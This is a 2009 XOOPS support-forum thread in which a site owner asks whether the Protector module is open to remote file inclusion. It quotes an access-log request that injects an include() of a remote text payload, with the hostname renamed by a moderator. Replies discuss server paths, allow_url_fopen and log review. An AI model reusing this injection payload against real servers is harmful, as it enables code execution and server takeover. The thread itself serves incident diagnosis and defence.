XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. 2.3.x Support 
  4.  / Is protector vulnerable to rfi attacks?
Register
1
kerkyra
Is protector vulnerable to rfi attacks?

  • 2009/10/4 21:39

  • kerkyra

  • Just can't stay away

  • Posts: 553

  • Since: 2005/2/14


hi i recently received an abuse complaint about my server. I found out that there was an RFI (Remote File Inclusion) attack in one of my domains. The xoops_lib and xoops_data folders where outside document root (httpdocs) and from the log i see that the oninstall.php file of protector is running a txt file!

Quote:
"GET
/logs/access.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://some_hacked_server.org/tools/idxx.txt??


any ideas or suggestions? Is this indeed a vulerability? Is there something i'm missing perhaps? Please advise on this. Thanks

Edit by Ghia: changed hostname: no links to crack tools on XOOPS.org please!
2
ghia
Re: Is protector vulnerable to rfi attacks?

  • 2009/10/5 15:56

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


If your xoops_lib is outside the root then this URL will have given a 404 not found error and the number of bytes returned will be 0.
It is indeed an attempt to try to get information of your server, but has not succeeded.


What do you mean by abuse complaint? Nothing happened or did it?
3
kerkyra
Re: Is protector vulnerable to rfi attacks?

  • 2009/10/5 19:11

  • kerkyra

  • Just can't stay away

  • Posts: 553

  • Since: 2005/2/14


actually something did happen. They start attacking other sites from my server (using a perl script). Not sure where they got access though!and not sure where to look either. It turned out that allow_url_fopen was on. I turned it off and now it seems to be ok! Again not sure about it! i will have to monitor the server and see.
4
ghia
Re: Is protector vulnerable to rfi attacks?

  • 2009/10/5 21:47

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


You need to review the Apache log files.

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

118 user(s) are online (68 user(s) are browsing Support Forums)

Members: 0

Guests: 118

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: May 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits